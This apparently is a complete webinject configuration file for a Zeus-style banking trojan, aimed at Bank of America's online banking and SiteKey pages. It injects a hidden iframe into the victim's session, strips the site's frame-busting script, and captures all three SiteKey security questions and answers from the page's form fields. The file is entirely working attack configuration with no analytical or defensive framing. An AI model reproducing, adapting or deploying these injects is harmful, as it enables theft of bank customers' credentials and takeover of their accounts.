;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; BOFA: SiteKey challenge questions and answers.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

set_url https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome G
data_before
data_end
data_inject
<iframe width="1" height="1" style="visibility:hidden" src="CustomerServiceMenuEntryPoint?custAction=75"></iframe>
data_end
data_after
</body>
data_end

set_url https://sitekey.bankofamerica.com/sas/sas-docs/js/commonscript.js G
data_before
top.location != self.location*{
data_end
data_inject
data_end
data_after
}
data_end

set_url https://sitekey.bankofamerica.com/sas/maint.do GL

;Q1
data_before
<select name="securityKey1"*<option  selected*>
data_end
data_inject
Q1: 
data_end
data_after
</
data_end

;A1
data_before
name="securityKey1Ans"*value="
data_end
data_inject
A1: 
data_end
data_after
"
data_end

;Q2
data_before
<select name="securityKey2"*<option  selected*>
data_end
data_inject

Q2: 
data_end
data_after
</
data_end

;A2
data_before
name="securityKey2Ans"*value="
data_end
data_inject
A2: 
data_end
data_after
"
data_end

;Q3
data_before
<select name="securityKey3"*<option  selected*>
data_end
data_inject

Q3: 
data_end
data_after
</
data_end

;A3
data_before
name="securityKey3Ans"*value="
data_end
data_inject
A3: 
data_end
data_after
"
data_end

;Copy of https://sitekey.bankofamerica.com/sas/maint.do. (internal wininet redirect problem).
set_url https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/CustomerServiceMenuEntryPoint?custAction=75 GL

;Q1
data_before
<select name="securityKey1"*<option  selected*>
data_end
data_inject
Q1: 
data_end
data_after
</
data_end

;A1
data_before
name="securityKey1Ans"*value="
data_end
data_inject
A1: 
data_end
data_after
"
data_end

;Q2
data_before
<select name="securityKey2"*<option  selected*>
data_end
data_inject

Q2: 
data_end
data_after
</
data_end

;A2
data_before
name="securityKey2Ans"*value="
data_end
data_inject
A2: 
data_end
data_after
"
data_end

;Q3
data_before
<select name="securityKey3"*<option  selected*>
data_end
data_inject

Q3: 
data_end
data_after
</
data_end

;A3
data_before
name="securityKey3Ans"*value="
data_end
data_inject
A3: 
data_end
data_after
"
data_end

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
